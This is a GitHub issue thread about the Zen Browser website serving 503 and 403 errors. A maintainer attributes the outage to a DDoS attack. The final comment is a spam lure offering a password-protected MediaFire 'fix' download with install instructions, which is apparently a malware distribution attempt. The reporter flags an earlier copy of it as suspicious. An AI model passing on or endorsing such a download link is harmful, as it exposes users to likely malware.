### ISSUE TITLE
503: zen-browser.app 

### ISSUE THREAD

**Issue by XargsUK** [zen-browser/desktop#955]
### What happened?

zen-browser.app website is currently serving a 503 error. 

![503 page on zen-browser.app](https://github.com/user-attachments/assets/f4fbc4f8-2cdf-47bd-9e07-727066a83b60)

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

NA

### Severity impact

High

### What platform are you seeing the problem on?

Windows

### Relevant log output

```shell
Since writing the above:

It's also now serving a 403 on Zen Browser, but loads correctly on Chromium based browsers. Setting as high as themes cannot be set using the Zen website. 
```

**Comment by XargsUK** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/xxxxxxxxxxxxxxxxxxx password: changeme when you installing, you need to place a check in install to path and select "gcc."

For other people reviewing this issue, if you come across this, **please do not click the link**. This was instantly commented upon opening the issue, and I cannot think of a reasonable reason why someone would link a password protected mediafire file to resolve an issue.

**Comment by mauro-balades** [comment]
Hi, the website has suffered a DDoS attack, it will be fixed shortly

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
